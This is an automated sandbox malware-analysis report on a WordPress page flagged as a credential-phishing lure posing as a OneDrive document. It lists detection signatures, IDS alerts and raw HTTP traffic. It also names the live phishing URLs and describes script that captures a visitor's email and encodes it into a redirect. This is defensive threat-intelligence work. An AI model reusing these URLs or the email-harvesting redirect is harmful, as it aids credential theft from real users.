Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/

Overview

General Information

Sample URL:https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/
Analysis ID:1578995
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected HtmlPhish10
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • chrome.exe (PID: 5912 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 6716 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 --field-trial-handle=2232,i,223269559508194267,12373527596569919649,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 5692 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_123JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    SourceRuleDescriptionAuthorStrings
    2.3.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-20T16:45:38.837543+010020221121Exploit Kit Activity Detected192.168.2.1149783192.0.76.3443TCP
      2024-12-20T16:45:40.516982+010020221121Exploit Kit Activity Detected192.168.2.1149794192.0.76.3443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

      Phishing

      barindex
      Source: Yara matchFile source: 2.3.pages.csv, type: HTML
      Source: Yara matchFile source: dropped/chromecache_123, type: DROPPED
      Source: https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/Joe Sandbox AI: Page contains button: 'CLICK HERE TO ACCESS THE DOCUMENT' Source: '1.0.pages.csv'
      Source: 0.25.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://benisp.com/dan/dann/dannn... This script demonstrates several high-risk behaviors, including data exfiltration and redirects to potentially malicious domains. The script collects the user's email input and appends it to a Base64-encoded URL, which is then used to redirect the user. This behavior is highly suspicious and could be indicative of a phishing or malware distribution attempt.
      Source: https://benisp.com/dan/dann/dannnHTTP Parser: Number of links: 0
      Source: https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/HTTP Parser: Base64 decoded: PN4ynP7J|3f?DMf%V7noZGuBm/fZmiG&n%-K_[yBdWg17D/kAfG+Qcl9mugZ1QEe71PeG-dtY2h/lexZ~Usf3|U~P4_nx=s?%hZ=tTQqKjx~UB6g+x|NzcleWQ-_8eMq.Ann4V%YVdnzUrGud,3&SUBCGY4hG2geRzl-8fQIvrKRzTogA-2JBhG|K6|%/o]ve6Fp|6KAX-ic]DEq|hMWdONcK2/ovy9MK9|DPzZ+ru
      Source: https://benisp.com/dan/dann/dannnHTTP Parser: Title: ****---*** does not match URL
      Source: https://benisp.com/dan/dann/dannnHTTP Parser: No favicon
      Source: https://oksu.ertanduzu.ru/gk59Agp/#lp4vwvt@iphsll.coHTTP Parser: No favicon
      Source: https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/HTTP Parser: No <meta name="author".. found
      Source: https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/HTTP Parser: No <meta name="author".. found
      Source: https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/HTTP Parser: No <meta name="author".. found
      Source: https://benisp.com/dan/dann/dannnHTTP Parser: No <meta name="author".. found
      Source: https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/HTTP Parser: No <meta name="copyright".. found
      Source: https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/HTTP Parser: No <meta name="copyright".. found
      Source: https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/HTTP Parser: No <meta name="copyright".. found
      Source: https://benisp.com/dan/dann/dannnHTTP Parser: No <meta name="copyright".. found
      Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.11:49783 -> 192.0.76.3:443
      Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.11:49794 -> 192.0.76.3:443
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.3
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.3
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.3
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.3
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.42
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.42
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.3
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.3
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.42
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.42
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.42
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.3
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /medahealthstaffing-proposal/ HTTP/1.1Host: dnearymedahealthstaffing.wordpress.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /_static/??-eJytjEsKwzAMRC9UR01caLsoPYs/IjhVbGNZCbl9HUKgB+hm4I00D9asXIoVY4VMMobIMEpDi2Vsl4Kw9M/u0V3BSiAPlpL7KAq2mLId1BaGCBty3Qg7x3yBH+8s6lRPWLNp+4NhTmkPL4QMzpQkjAS8hoxFWYn+D7bz6Sx24Xt+9Xet9XDTg56+vYhgvQ==&cssminify=yes HTTP/1.1Host: s0.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dnearymedahealthstaffing.wordpress.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://dnearymedahealthstaffing.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /_static/??-eJxdjNsKgzAQRH/IuBgpJQ+l3xKTJWguG7Ib/H0VpLR9GTjDzIG9KkdFsAjkrmrqYS0MG0q1Lt4MmegK3xMyNExW0KtKLH80OuYBvpRLovCRZtsiylqCWmyDc/rbXOd3fk1PbR7azJPeDoasOhw=&cssminify=yes HTTP/1.1Host: s1.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dnearymedahealthstaffing.wordpress.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://dnearymedahealthstaffing.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /_static/??/wp-content/mu-plugins/core-compat/wp-mediaelement.css,/wp-content/mu-plugins/wpcom-bbpress-premium-themes.css?m=1432920480j&cssminify=yes HTTP/1.1Host: s1.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dnearymedahealthstaffing.wordpress.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://dnearymedahealthstaffing.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /_static/??-eJx9jcEOwjAMQ3+IEnUH2AXxLVuVlUDaVG2mib8ngAQDJG72S2zDUlyQrJgV0uwKz5FygyApGXJMFzTXvsjWyAYIsihZur3E87Dq1BMmayjzCBMuWKHplfHnbTVdcWSJJuNj923/hSKKYwmDkuQP4yYeqN6jx3Twe9/5Xd/77nwDsx1cLg==&cssminify=yes HTTP/1.1Host: s1.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dnearymedahealthstaffing.wordpress.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://dnearymedahealthstaffing.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/js/rlt-proxy.js?m=1720530689i HTTP/1.1Host: s1.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dnearymedahealthstaffing.wordpress.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://dnearymedahealthstaffing.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/themes/h4/global.css?m=1420737423i&cssminify=yes HTTP/1.1Host: s2.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dnearymedahealthstaffing.wordpress.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://dnearymedahealthstaffing.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/12/onedrive-for-business.webp HTTP/1.1Host: dnearymedahealthstaffing.wordpress.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/js/rlt-proxy.js?m=1720530689i HTTP/1.1Host: s1.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/themes/pub/fewer/assets/fonts/epilogue_300.ttf HTTP/1.1Host: s2.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dnearymedahealthstaffing.wordpress.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://dnearymedahealthstaffing.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /_static/??-eJx9jtEOgjAMRX/I0egk8mL8FDPmJB1ru7At/D4jAaM+8HhP7rktzFFZ4ew4g09A0mNwqiQ3maEyhfyWxqcTfPWoqBjKgJzAuxyNHbdcdWF4IlvoC4YXWDNJ3Qqf3g4aQj6YtUK0Xg84urT+9QOOxG1fzbEqf7F6D7qfb1p3rb5eOr8AfZ5eQA== HTTP/1.1Host: s0.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dnearymedahealthstaffing.wordpress.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://dnearymedahealthstaffing.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/js/bilmur-4.min.js?i=12&m=202451 HTTP/1.1Host: dnearymedahealthstaffing.wordpress.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /js/hovercards/hovercards.min.js?ver=202451b213a1cbb4e3271ca470eb7790af362ac2e18ce468f8945952c7bd3456d2132e HTTP/1.1Host: 0.gravatar.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://dnearymedahealthstaffing.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1610363240i HTTP/1.1Host: s2.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dnearymedahealthstaffing.wordpress.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://dnearymedahealthstaffing.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /w.js?67 HTTP/1.1Host: stats.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://dnearymedahealthstaffing.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /s/epilogue/v17/O4ZMFGj5hxF0EhjimngomvnCCtqb30OX1zTiCZXVigHPVA.woff2 HTTP/1.1Host: fonts.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dnearymedahealthstaffing.wordpress.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://dnearymedahealthstaffing.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/12/onedrive-for-business.webp HTTP/1.1Host: dnearymedahealthstaffing.wordpress.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/js/bilmur-4.min.js?i=12&m=202451 HTTP/1.1Host: dnearymedahealthstaffing.wordpress.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1610363240i HTTP/1.1Host: s2.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /w.js?67 HTTP/1.1Host: stats.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /js/hovercards/hovercards.min.js?ver=202451b213a1cbb4e3271ca470eb7790af362ac2e18ce468f8945952c7bd3456d2132e HTTP/1.1Host: 0.gravatar.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/blog-plugins/marketing-bar/images/wpcom-mark.svg HTTP/1.1Host: s1.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://s1.wp.com/_static/??-eJxdjNsKgzAQRH/IuBgpJQ+l3xKTJWguG7Ib/H0VpLR9GTjDzIG9KkdFsAjkrmrqYS0MG0q1Lt4MmegK3xMyNExW0KtKLH80OuYBvpRLovCRZtsiylqCWmyDc/rbXOd3fk1PbR7azJPeDoasOhw=&cssminify=yesAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /js/hovercards/hovercards.min.css?ver=202451b213a1cbb4e3271ca470eb7790af362ac2e18ce468f8945952c7bd3456d2132e HTTP/1.1Host: 0.gravatar.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dnearymedahealthstaffing.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /g.gif?x_stats-initial-visibility=visible&v=wpcom-no-pv&rand=0.5533248508418851 HTTP/1.1Host: pixel.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dnearymedahealthstaffing.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /g.gif?blog=240074490&v=wpcom&tz=-8&user_id=0&post=22&subd=dnearymedahealthstaffing&host=dnearymedahealthstaffing.wordpress.com&ref=&rand=0.5972709169619024 HTTP/1.1Host: pixel.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dnearymedahealthstaffing.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /_static/??-eJx9jtEOgjAMRX/I0egk8mL8FDPmJB1ru7At/D4jAaM+8HhP7rktzFFZ4ew4g09A0mNwqiQ3maEyhfyWxqcTfPWoqBjKgJzAuxyNHbdcdWF4IlvoC4YXWDNJ3Qqf3g4aQj6YtUK0Xg84urT+9QOOxG1fzbEqf7F6D7qfb1p3rb5eOr8AfZ5eQA== HTTP/1.1Host: s0.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /g.gif?crypt=UE40eW5QN0p8M2Y%2FRE1mJVY3bm9aR3VCbS9mWm1pRyZuJS1LX1t5QmRXZzE3RC9rQWZHK1FjbDltdWdaMVFFZTcxUGVHLWR0WTJoL2xleFp%2BVXNmM3xVflA0X254PXM%2FJWhaPXRUUXFLanh%2BVUI2Zyt4fE56Y2xlV1EtXzhlTXEuQW5uNFYlWVZkbnpVckd1ZCwzJlNVQkNHWTRoRzJnZVJ6bC04ZlFJdnJLUnpUb2dBLTJKQmhHfEs2fCUvb112ZTZGcHw2S0FYLWljXURFcXxoTVdkT05jSzIvb3Z5OU1LOXxEUHpaK3J1&v=wpcom-no-pv&rand=0.2779972937038586 HTTP/1.1Host: pixel.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: 